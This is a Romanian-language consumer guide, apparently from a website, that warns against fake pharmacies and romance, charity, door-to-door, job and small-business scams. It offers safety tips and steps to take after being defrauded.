Produsele sunt promovate prin afirmaţii false precum: „slăbiţi 10 kilograme în 10 zile” sau „slăbiţi în timp ce dormiţi” şi adesea implică sume considerabile în avans sau înscrierea în contracte pe termen lung pentru participarea în program.
Farmaciile online false folosesc internetul şi e-mailurile spam pentru a oferi medicamente şi remedii la preţuri foarte mici şi/sau fără necesitatea unei reţete de la medic. Dacă utilizaţi un astfel de serviciu veţi primi produsele pe care le comandaţi, însă nu aveţi nicio garanţie că acestea sunt autentice.
Există farmacii online autentice. Aceste companii vor avea listate pe pagina web datele complete de contact şi, de asemenea, vor solicita o reţetă valabilă înainte de a vă trimite medicamentele comandate.

Reţineţi
Nu există pilule magice sau variante sigure pentru a slăbi rapid.
Atenţie
Nu promiteţi nimic sub presiune.
Gândiţi-vă
Nu vă încredeţi într-o afirmaţie nefondată cu privire la medicamente, suplimente sau alte tratamente. Consultaţi-vă cu medicul dumneavoastră.
Cercetaţi
Solicitaţi documentele medicale sau de cercetare publicate, pentru dovedirea afirmaţiilor realizate de către promovatori.
Întrebaţi-vă
Dacă tratamentul este într-adevăr miraculos nu v-ar fi informat medicul dumneavoastră în legătură cu acesta?

Escrocherii referitoare la spiritism şi clarviziune

Escrocheriile referitoare la spiritism şi clarviziune există de mult timp. Adesea, escrocii vă oferă secretele acestora către bogăţie şi alte planuri sau descoperiri, care conform afirmaţilor acestora vă vor aduce noroc şi bani.

La ce să fim atenţi!
O escrocherie referitoare la spiritism sau clarviziune poate ajunge la dumneavoastră prin diferite căi: prin poştă, e-mail, apel telefonic sau personal. De regulă, un presupus clarvăzător va pretinde că ştie cu ce necazuri vă confruntaţi şi vă va oferi o soluţie – contra unui onorariu. Această „soluţie” poate consta în numere câştigătoare la loterie, o incantaţie pentru noroc sau îndepărtarea unui blestem sau farmec. De asemenea, aceşti şarlatani pot încerca să vă convingă să cumpăraţi „secrete pentru sănătate” sau alte planuri şi „descoperiri” despre care aceştia pretind că vă vor schimba cursul vieţii pentru totdeauna. Escrocii obţin câştiguri taxându-vă costuri pentru talismane norocoase sau secrete de sănătate trimiţându-vă în schimb un articol nevaloros – sau chiar nimic. Înşelătoriile referitoare la spiritism pot fi folosite, de asemenea, pentru escrocherii prin loterie.
Dacă un aşa zis specialist în spiritism vă oferă o listă de numere de loterie norocoase, să nu fiţi surprins dacă în scurt timp veţi primi o scrisoare anunţându-vă că tocmai aţi câştigat un premiu la o loterie de care nu aţi auzit niciodată şi nici nu vă amintiţi să vă fi înscris.
Nu vă lăsaţi păcălit de două ori.
Aşa zişii specialiştii în spiritism sau clarviziune pot încerca să vă convingă că sunt competenţi spunându-vă ceva despre voi înşivă. Dacă ceea ce vă spun este vag şi general poate la fel de bine să fie valabil pentru oricine altcineva.

Reţineţi
Excrocheriile referitoare la spiritism şi clarviziune se bazează pe curiozitatea dumneavoastră.
Atenţie
Niciodată nu trimiteţi bani sau date despre cardul de credit sau contul online niciunui necunoscut sau unei persoane în care nu aveţi încredere. Dacă oferta a venit prin intermediul unui e-mail nu răspundeţi e-mailului şi nu încercaţi să vă dezabonaţi. Acest lucru va confirma escrocilor că adresa de e-mail este activă.
Gândiţi-vă
Reflectaţi şi consideraţi cu atenţie orice sfat sau sugestie ce v-au fost oferite de către cineva care pretinde a fi specialist în spiritism.
Cercetaţi
Examinaţi dacă există dovezi pentru a susţine afirmaţiile realizate de către spiritist sau clarvăzător.
Întrebaţi-vă
Nu mă pun în pericol pe mine, familia sau prietenii acţionând în conformitate cu sfatului hazardat al unui străin?

Escrocherii prin întâlniri amoroase

Cu toate că există o mulţime de website-uri legitime, există la fel de multe escrocherii care implică întâlnirile amoroase. Escrocheriile prin întâlniri amoroase încearcă să vă facă să lăsaţi garda jos apelând la partea dumneavoastră romantică sau compătimitoare.

La ce să fim atenţi!
Unele escrocherii romantice funcţionează prin crearea unui website de matrimoniale unde plătiţi pentru fiecare e-mail sau mesaj pe care îl trimiteţi sau primiţi. Escrocul va încerca să vă păcălească trimiţându-vă în continuare e-mailuri ce par vagi şi sunt pline cu vorbe de dragoste şi dorinţă. De asemenea, escrocul vă poate trimite e-mailuri pline cu detalii despre ţara sau oraşul natal al acestuia, fără a face vreo referire la dumneavoastră. Acestea sunt încercări de a vă convinge să îi scrieţi în continuare plătind bani pentru utilizarea website-ului matrimonial al escrocului.

Chiar şi în cazul unui site de matrimonial legitim este posibil să fiţi abordat de către un escroc – de ex. cineva care pretinde că un membru al familiei sale este foarte bolnav şi se află într-o situaţie disperată (adesea escrocii pretind că sunt din Rusia sau Europa de Est). După ce v-au trimis câteva mesaje şi poate chiar şi o fotografie strălucită, vă vor cere (în mod direct sau mai subtil) să le trimiteţi bani pentru a-i ajuta să facă faţă situaţiei cu care se confruntă. Unii escroci chiar aranjează o întâlnire, în speranţa că le veţi oferi cadouri sau bani – şi, pe urmă, aceştia dispar.

În alte cazuri, escrocii vor încerca să se împrietenească cu dumneavoastră, poate chiar vă vor trimite flori sau alte mici cadouri. După ce aţi devenit prieteni, escrocul vă va povesti despre o sumă mare de bani pe care acesta trebuie să o transfere în afara ţării şi pe care doreşte să o împartă cu dumneavoastră. Pe urmă, vă va solicita date bancare sau bani pentru un mic comision sau taxă de administrare, ce pretinde că trebuie achitată în vederea eliberării banilor.

Reţineţi
Verificaţi cu atenţie adresa website-ului. Adesea, escrocii pun bazele unor site-uri false foarte similare cu adresele site-urilor autentice de matrimoniale.
Atenţie
Nu trimiteţi niciodată bani şi nici nu divulgaţi date privind cardul de credit sau contul online unor persoane necunoscute sau în care nu aveţi încredere.
Gândiţi-vă
Nu divulgaţi informaţii personale într-un e-mail sau prin servicii de mesagerie instant.
Cercetaţi
Asiguraţi-vă că folosiţi doar site-uri matrimoniale legitime şi recunoscute
Întrebaţi-vă
V-ar declara o persoană pe care nu aţi cunoscut-o niciodată iubire eternă după doar câteva scrisori sau e-mailuri?



Escrocherii prin acţiuni de caritate

Escrocii care organizează înşelătorii prin acţiuni de caritate profită de generozitatea şi bunătatea oamenilor solicitându-le donaţii pentru o cauză falsă sau întruchipând o cauză de caritate autentică.

La ce să fim atenţi!
Escrocheriile prin acţiuni de caritate implică colectarea de bani de către escroci ce pretind a aparţine de o organizaţie de caritate autentică. Escrocii vă pot aborda în diferite moduri – pe stradă, acasă la dumneavoastră, la telefon sau online. E-mailurile şi chiar căniţele de colectat bani pot fi prevăzute cu logo-uri ale organizaţilor de caritate autentice.
Adesea, un escroc va încerca să exploateze un dezastru natural recent sau o situaţie de criză ce a fost prezentată la ştiri.
Alţi escrocii apelează la emoţiile voastre pretinzând că aparţin organizaţiilor de caritate care ajută copiii bolnavi.
Escrocii pot încerca să facă presiuni asupra voastră pentru a vă convinge să faceţi o donaţie sau vă pot oferi date false sau chiar pot refuza să ofere informaţii despre respectiva organizaţie de caritate, de ex. adresa sau datele de contact.

Aceste escrocherii nu numai că duc la pierderea banilor oamenilor bine intenţionaţi dar şi privează de donaţii organizaţiile şi cauzele de caritate legitime. Din fericire, acest tip de escrocherii nu este practicat foarte mult. Organizaţiile de caritate legitime sunt înregistrare la nivel naţional sau local. Verificaţi autenticitatea organizaţiei de caritate pe care doriţi să o susţineţi. Dacă organizaţia este autentică şi doriţi să faceţi o donaţie obţineţi datele de contact ale acesteia din cartea de
telefon sau un website de încredere.
Dacă nu doriţi să donaţi bani sau sunteţi mulţumit de suma pe care aţi donat-o deja pentru caritate, ignoraţi pur şi simplu e-mailul sau scrisoarea, închideţi telefonul sau refuzaţi să oferiţi bani persoanei care se află la uşa dumneavoastră pentru a vă solicita o donaţie. Nu sunteţi nevoit să oferiţi o donaţie în bani.

Reţineţi
Dacă aveţi dubii cu privire la persoana care vă solicită o sumă de bani nu îi oferiţi bani, sau date cu privire la cardul de credit sau contul bancar.
Atenţie
Nu divulgaţi niciodată la telefon date cu privire la cardul de credit sau contul online, afară de cazul în care voi aţi efectuat apelul sau numărul de telefon provine dintr-o sursă sigură.
Gândiţi-vă
Dacă aveţi dubii, abordaţi direct o organizaţie de caritate pentru a face o donaţie sau pentru a oferi suport.
Cercetaţi
Investigaţi dacă organizaţia ce v-a contactat în vederea unei donaţii este o organizaţie autentică.
Întrebaţi-vă
În ce mod şi cui aş dori să ofer o contribuţie?

Escrocherii din uşă în uşă

Vânzările din uşă în uşă pot promova servicii de întreţinere precum: dezinsecţie, reparaţii în casă, grădinărit şi chiar servicii referitoare la utilităţi, de ex. electricitate şi telefonie. Multe companii legitime vând produse din uşă în uşă, însă această abordare este folosită şi de către escroci.

La ce să fim atenţi!
Escrocheriile din uşă în uşă implică promovarea de produse şi servicii ce nu sunt livrate sau sunt de o calitate foarte proastă. Nu veţi obţine, din partea unui escroc, calitate pentru banii cheltuiţi şi puteţi să vă treziţi cu o notă de plată pentru servicii pe care nu le-aţi dorit sau cu privire la care nu v-aţi dat acordul.
Uneori escrocii pretind că efectuează un sondaj de opinie astfel încât să poată obţine datele dumneavoastră sau să îşi ascundă scopul de a vinde produse până ce reuşesc să vorbească pentru un timp cu voi. Mai grav este faptul că scopul adevărat al unui vânzător din uşă în uşă s-ar putea să fie plănuirea unei spargeri ulterioare în locuinţa dumneavoastră.
În mod normal vânzătorii din uşă în uşă vin neinvitaţi, uneori pur şi simplu apărând la uşa dumneavoastră. Vânzătorii din uşă în uşă nu sunt musafiri în casa dumneavoastră – scopul acestora este de vă convinge să le cumpăraţi produsele şi aceştia trebuie să plece dacă îi rugaţi acest lucru.
Chiar şi în cazul companiilor şi produselor autentice, operatori fără scrupule pot acţiona ilegal în detrimentul altor persoane. Există legi specifice cu privire la vânzările din uşă în uşă, inclusiv privind acordarea unei perioade de aşteptare -în timpul căreia vă puteţi răzgândi şi solicita banii înapoi.
Dacă sunteţi interesat de oferta vânzătorului din uşă în uşă, interesaţi-vă de compania pe care o reprezintă şi de ceea ce are de oferit. Nu uitaţi să faceţi cumpărături şi din ale locuri pentru a cunoaşte care sunt preţurile astfel încât să obţineţi o ofertă bună.

Reţineţi
Dacă cineva se prezintă la uşa dumneavoastră solicitaţi-i să se identifice. Nu sunteţi nevoit să le permiteţi să intre şi respectivii comercianţi trebuie să plece dacă le cereţi acest lucru.
Atenţie
Nu conveniţi niciodată nimic fără a citi cu atenţie toate termenele şi condiţiile fiecărei oferte – pretenţiile de oferte gratuite sau foarte ieftine ascund adesea costuri suplimentare.
Gândiţi-vă
Nu acceptaţi niciodată o ofertă care implică o sumă considerabilă de bani, timp şi angajament. Solicitaţi sfaturi avizate, mai întâi.
Cercetaţi
Dacă sunteţi interesat de oferta unui vânzător din uşă în uşă, interesaţi-vă de compania pe care acesta o reprezintă şi de ofertă. Faceţi cumpărături şi din ale locuri pentru cunoaşte preţurile astfel încât să obţineţi o ofertă cât mai bună.
Întrebaţi-vă
Există o perioadă de aşteptare acordată pentru anularea unui contract sau a unei achiziţii?

Escrocherii referitoare la locuri de muncă şi angajare

Escrocheriile referitoare la locuri de muncă şi angajare ţintesc persoanele care îşi caută un loc de muncă sau doresc să îşi schimbe locul de muncă. Adesea promit un venit considerabil – uneori acesta fiind oferit chiar şi în schimbul unui efort infim sau fără efort.

La ce să fim atenţi!
Escrocheriile lucraţi de acasă sunt adesea promovate prin e-mailuri spam sau reclame anunţuri la aviziere. Majoritatea acestor anunţuri nu sunt oferte reale de muncă. Multe dintre ele sunt faţade pentru activităţi de spălare de bani sau scheme piramidale.
Este posibil să primiţi un e-mail în care vi se oferă un loc de muncă unde folosiţi contul dumneavoastră bancar pentru a primi şi a transfera plăţi pentru o companie din străinătate. Aceste „oferte de muncă” vă promit că veţi primi un comision pentru fiecare plată pe care o transmiteţi mai departe. Uneori, escrocii urmăresc doar să afle datele contului dumneavoastră bancar astfel încât să îl poată accesa.
O escrocherie ce implică angajarea sau un venit garantat pretinde oferirea fie a unui loc de muncă fie a unui anumit nivel de venit. De regulă, escrocii vă pot contacta prin e-mail iar ofertele implică adesea plata unui comision în avans pentru un „plan de afaceri”, anumite materiale de pornire sau un software.
Există un tip de escrocherii promovat ca şi oportunitate de afaceri. Vi se poate solicita efectuarea unei plăţi în avans (pentru ceva care nu funcţionează sau nu corespunde cu ceea ce v-aţi aşteptat) sau recrutarea altor persoane.

Reţineţi
Nu există căi rapide către îmbogăţire – singurele persoane care fac bani sunt escrocii.
Atenţie
Nu trimiteţi niciodată datele contului bancar sau ale cardului de credit nici unei persoane necunoscute şi în care nu aveţi încredere.
Gândiţi-vă
Nu luaţi decizii fără a studia cu atenţie oferta. Solicitaţi sfatul unei persoane avizate înainte de a lua o decizie.
Cercetaţi
Feriţi-vă de produse sau scheme ce pretind să vă garanteze venitul şi de oferte de muncă pentru care vi se solicită achitarea unui comision în avans. Asiguraţi-vă că orice oportunitate de afacere in franciză este legitimă.
Întrebaţi-vă
Am obţinut în scris toate datele înainte de a plăti sau semna?

Escrocherii referitoare la companii mici

Escrocheriile care ţintesc companiile mici pot fi de diferite feluri – de la facturi pentru reclame sau pentru înregistrări în cataloage ce nu au fost comandate niciodată la oferte suspecte pentru consumabile.

La ce să fim atenţi!
Operatorii companiilor mici şi indivizii ce deţin un site propriu continuă să fie surprinşi de scrisori nesolicitate, prin care sunt avertizaţi că domeniul acestora de internet este pe cale de a expira şi trebuie reînnoit, sau le este oferit un nou domeniu similar cu cel actual. Dacă aveţi înregistrată denumirea unui domeniu verificaţi cu atenţie orice notificare de reînnoire a domeniului sau facturi pe care le primiţi. Cu toate că notificarea poate fi autentică, în acelaşi timp este posibil ca aceasta să fie trimisă din partea unei companii care încearcă să vă convingă să vă înscrieţi, sau este posibil să fie din partea unui escroc.

– Verificaţi dacă notificarea de reînnoire corespunde exact cu denumirea domeniului dumneavoastră actual. Verificaţi micile diferenţe.
– Verificaţi dacă notificarea de reînnoire este trimisă de către compania cu care v-aţi înregistrat iniţial denumirea domeniului.
– Verificaţi înregistrările dumneavoastră pentru a afla data actuală de expirare a denumirii existente a domeniului.

Escrocheriile ce implică înregistrarea într-un catalog sau publicitatea neautorizată implică încercarea de taxare a unei companii pentru o înscriere sau reclamă într-o revistă, ziar sau catalog/ghid de companii.
Escrocheria poate apărea sub forma unei propuneri pentru un abonament deghizată într-o factură pentru o înregistrare într-un catalog internaţional comercial, fals.
De asemenea, puteţi fi convinşi să credeţi că răspundeţi unei oferte de înregistrare gratuită, pe când, în realitate oferta este pentru înregistrări pentru care ulterior vi se va solicita plata.

O altă abordare comună utilizată de către escroci este de a suna o firmă solicitând confirmarea datelor cu privire la o reclamă, pe care aceştia pretind că a fost comandată. Este posibil ca escrocul să citeze o intrare autentică sau o reclamă pe care compania dumneavoastră a publicat-o într-o altă publicaţie sau catalog pentru a vă convinge că aţi utilizat într-adevăr serviciul escrocului.
Printr-o escrocherie ce implică returul unui fax vi se poate oferi orice de la diete uimitoare la afaceri fantastice, înregistrări în catalogul de companii şi înscrieri în concursuri – tot ce trebuie să faceţi este să trimiteţi un fax la un număr cu tarif special. Tarifele pentru acest tip de faxuri pot să ajungă până la $6.00 per minut. Escrocii se vor asigura că expedierea faxului dumneavoastră durează câteva minute, acest lucru ducând la ridicarea costului facturii telefonice.
Escrocheriile cu consumabile implică primirea şi taxarea pentru bunuri, pe care nu le-aţi comandat. Adesea aceste escrocherii implică bunuri şi servicii pe care le comandaţi în mod regulat – de exemplu, hârtie, cartuşe pentru imprimantă, bunuri pentru întreţinere sau publicitate.

Este posibil să primiţi un apel telefonic de la cineva care pretinde a fi „furnizorul dumneavoastră obişnuit”, comunicându-vă că oferta acestuia este „specială” sau „limitată pentru o perioadă de timp”. Dacă conveniţi achiziţionarea bunurilor ce vă sunt oferite, riscaţi să achitaţi la suprapreţ şi să primiţi produse de calitate proastă.

Reţineţi
Asiguraţi-vă că personalul responsabil cu procesarea facturilor şi răspunderea la telefon este informat cu privire la aceste escrocherii. Cel mai adesea, aceştia vor fi punctul de contact pentru escroci. Verificaţi întotdeauna faptul că bunurile şi serviciile au fost atât comandate cât şi livrate înainte de a achita o factură.
Atenţie
Nu oferiţi niciodată şi nu clarificaţi nicio informaţie cu privire la compania dumneavoastră afară de cazul în care cunoaşteţi scopul pentru care vor fi utilizate aceste informaţii.
Gândiţi-vă
Nu acceptaţi o propunere de afaceri la telefon – solicitaţi întotdeauna o ofertă în scris. În cadrul companiei dumneavoastră limitaţi numărul de persoane cu acces la fonduri sau care sunt autorizate să aprobe achiziţii.
Cercetaţi
Prin procedee de management eficient producerea acestor escrocherii poate fi împiedicată. Existenţa unor proceduri clar definite pentru verificarea, plata şi gestionarea conturilor şi a facturilor reprezintă un mijloc de apărare eficient împotriva acestor tipuri de escrocherii.
Întrebaţi-vă
Dacă la telefon vi se spune că aţi comandat sau autorizat un anumit lucru, şi nu vi se pare că este adevărat, nu este normal să cereţi o dovadă?


Ponturi eficiente prin care vă protejaţi împotriva înşelătoriilor

Protejaţi-vă identitatea
– oferiţi date şi informaţii personale numai dacă este absolut necesar şi dacă aveţi încredere în persoana cu care vorbiţi sau aveţi de-a face.
– distrugeţi datele persoanele: nu le aruncaţi pur şi simplu. Trebuie să distrugeţi facturile, extrasele bancare sau cardurile vechi – de exemplu cardurile de credit şi cardurile bancare.
– Aveţi grijă de datele personale la fel cum aveţi grijă de bani: nu le lăsaţi la îndemâna celorlalţi.

Chestiuni referitoare la banii
– nu trimiteţi niciodată bani nici unei persoane pe care nu o cunoaşteţi sau în care nu aveţi încredere.
– Nu trimiteţi bani şi nu achitaţi nici un comision pentru a revendica un premiu sau câştiguri la loterie.
– „Ofertele de muncă” prin care vi se solicită să folosiţi propriul cont bancar pentru a transfera bani pentru cineva pot fi o faţadă pentru o activitate de spălare de bani. Spălarea de bani reprezintă o infracţiune gravă.
– evitaţi transferul sau trimiterea prin telegraf a rambursărilor sau a altor sume de bani către persoane necunoscute.

Abordarea personală (faţă în faţă)
– dacă cineva se prezintă la uşa dumneavoastră, solicitaţi-le autorizaţia. Nu trebuie să îi lăsaţi înăuntru iar dacă îi rugaţi să plece aceştia trebuie să facă acest lucru.
– Înainte de vă decide să achitaţi o anumită sumă de bani, dacă sunteţi interesat de oferta vânzătorului, luaţi-vă un timp să aflaţi informaţii cu privire la compania în cauză şi ofertă.

Apeluri telefonice
– dacă primiţi un apel telefonic de la o persoană necunoscută, întrebaţi întotdeauna numele persoanei cu care vorbiţi şi pe cine reprezintă. Verificaţi această informaţie sunând la companie voi înşivă.
– Nu oferiţi la telefon date personale, cu privire la cardul de credit sau contul online, afară de cazul în care voi înşivă aţi efectuat apelul iar numărul de telefon este dintr-o sursă sigură.
– Este mai bine să nu răspundeţi mesajelor text sau apelurilor pierdute care provin de la numere de telefon necunoscute.

Oferte prin e-mail
– nu răspundeţi niciodată unui e-mail spam, chiar şi cu scopul de a vă dezabona – adesea acest lucru serveşte doar pentru a confirma escrocilor că adresa dumneavoastră de e-mail este activă. Cea mai bună soluţie este să ştergeţi toate e-mailurile suspecte, fără a le deschide.
– Închideţi „fereastra de vizualizare” deoarece prin simpla vizualizare a e-mailului îi confirmaţi expeditorului că adresa dumneavoastră este activă.
– Băncile şi instituţiile financiare legitime nu vă vor solicita niciodată date cu privire la contul bancar într-un e-mail şi nici nu vă vor solicita să faceţi click pe un link pentru a accesa contul dumneavoastră.
– Nu apelaţi niciodată un număr de telefon şi nu vă încredeţi în datele de contact furnizate într-un e-mail spam.

Abordarea online

– Instalaţi un software care vă protejează calculatorul de viruşi şi programe nedorite şi asiguraţi-vă că este actualizat în mod constant. Dacă sunteţi nesigur solicitaţi asistenţa unui specialist în calculatoare.
– Dacă doriţi să accesaţi un website, utilizaţi un link semn de carte către website sau tastaţi adresa website-ului în browser. Nu accesaţi niciodată un link dintr-un e-mail.
– Verificaţi cu atenţie adresa website-ului. Adesea, escrocii creează website-uri false cu adrese foarte similare website-urilor legitime.
– Feriţi-vă de site-urile ce vă oferă descărcări gratuite (de ex. muzică, filme cu conţinut pentru adulţi, jocuri şi filme). Prin descărcarea acestor produse puteţi instala programe dăunătoare în calculator fără a fi conştient de acest lucru.
– Evitaţi să faceţi click pe reclamele pop-up – acest lucru poate duce la instalarea unor programe dăunătoare în calculatorul dumneavoastră.
– Nu înregistraţi niciodată date personale, despre cardul de credit sau contul online pe un website despre care nu sunteţi sigur că este autentic.
– Nu trimiteţi niciodată datele personale, date despre cardul de credit sau contul online prin e-mail.
– Evitaţi folosirea calculatoarelor publice (la biblioteci sau internet cafe) în vederea efectuării de operaţiuni bancare online sau cumpărături online.
– În momentul în care folosiţi calculatoarele publice ştergeţi din istorie sau memoria calculatorului operaţiunile pe care le-aţi efectuat.
– Fiţi precaut atunci când folosiţi un software care completează automat formularele online. În acest mod le puteţi oferi escrocilor, cu uşurinţă, accesul către datele dumneavoastră personale sau cele referitoare la cardul de credit.
– Alegeţi parole ce sunt greu de ghicit pentru orice altcineva – de exemplu parole care includ atât litere cât şi cifre. De asemenea, trebuie să schimbaţi în mod regulat parolele.
– Atunci când faceţi cumpărături online, printaţi orice copii ale tranzacţiilor şi achitaţi numai prin intermediul unui site sigur.    – Dacă folosiţi un site de licitaţii notaţi-vă numerele de identificare implicate şi citiţi toate sfaturile privind securitate precizate pe prima pagină a site-ului.

Ce este de făcut în cazul în care aţi fost înşelat!

REDUCEREA DAUNELOR
Deşi, banii pe care i-aţi pierdut din cauza unei escrocherii sunt greu de recuperat, există anumiţi paşi pe care îi puteţi efectua pentru a reduce daunele şi a evita să deveniţi ţinta unei alte înşelăciuni. Cu cât acţionaţi mai repede cu atât veţi avea şansa de a vă reduce pierderile.
Raportaţi escrocheriile. Raportând autorităţilor o escrocherie acestea vor putea avertiza alte persoane cu privire la respectiva înşelăciune şi vor putea minimiza şansele de răspândire a escrocheriei. De asemenea, trebuie să vă avertizaţi prietenii şi membrii familiei cu privire la orice escrocherii pe care le descoperiţi.

În cazul în care aţi fost păcălit să achiziţionaţi un produs sau un serviciu
Contactaţi asociaţiile de protecţie a consumatorului locale şi raportaţi înşelăciunea. Aveţi în vedere două opţiuni: posibilitatea existenţei unei perioade de aşteptare (pentru returnarea produselor) sau negocierea unei rambursări (mai ales dacă comerciantul este din ţară)

În cazul în care cineva a accesat contul dumneavoastră online, contul bancar sau a obţinut date despre cardul de credit
Sunaţi de îndată, instituţia financiară astfel încât contul dumneavoastră să fie închis cât mai curând posibil, în acest fel limitându-se suma de bani pe care o pierdeţi. Instituţiile bancare pot, de asemenea, efectua o operaţie de „refuz de plată” (inversare tranzacţie) dacă consideră că s-a efectuat o tranzacţie frauduloasă prin cardul dumneavoastră de credit.

Nu folosiţi datele de contact ce sunt menţionate în e-mailuri sau website-uri ce vi se par suspecte – probabil că acestea sunt false şi vă conduc către un escroc. Veţi putea găsi date de contact legitime în cartea de telefon, în estrasul de cont bancar sau pe verso-ul cardului bancar.

În cazul în care escrocheriile privesc tratamente medicale

Opriţi-vă de a mai consuma pastile sau substanţe ce nu sunt sigure. Consultaţi un doctor sau un alt specialist în medicină cât mai curând posibil. Informaţi medicul cu privire la tratamentul medical, pe care vi l-a vândut escrocul (luaţi cu dumneavoastră cu scopul de a arăta medicului orice tip substanţă inclusiv ambalajul). De asemenea, informaţi medicul dacă aţi sistat orice tip de tratament pe care îl urmaţi înainte de înşelătorie.

În cazul în care aţi trimis bani cuiva pe care îl bănuiţi a fi escroc

Dacă aţi trimis bani prin transfer electronic de fonduri (online) contactaţi de îndată instituţia financiară. Dacă aceştia nu au procesat încă transferul, acesta poate fi anulat.

Dacă aţi trimis un cec contactaţi de îndată instituţia financiară. Dacă escrocul, nu a încasat încă cecul aceasta poate fi anulat.

Dacă aţi trimis bani printr-un serviciu de telegraf (de ex. Western Union), contactaţi, de îndată, compania care v-a oferit serviciul. Dacă sunteţi foarte rapid, transferul se poate opri.

Dacă aţi fost păcălit de către un comerciant sau vânzător din uşă în uşă
Puteţi fi protejat de legi care vă asigură o „perioadă de aşteptare”, în timpul căreia puteţi anula un acord sau contract pe care l-aţi semnat.

Dacă aţi fost înşelat prin utilizarea calculatorului
Dacă foloseaţi calculatorul în timp ce aţi fost înşelat este posibil ca un virus sau un alt software dăunător să fie încă în calculatorul dumneavoastră. Efectuaţi o verificare completă a sistemului folosind un software de securitate sigur.

Dacă nu aveţi instalat în calculator un software de securitate (de ex. programe de scanare viruşi sau firewall) un specialist în calculatoare vă poate ajuta să alegeţi unul.

Este posibil ca escrocii să fi obţinut şi accesul la parolele online. Schimbaţi-le folosind un calculator sigur.

În cazul în care escrocheria implică telefonul mobil
Sunaţi compania de telefonie şi informaţi-i cu privire la cele întâmplate.

By o9admin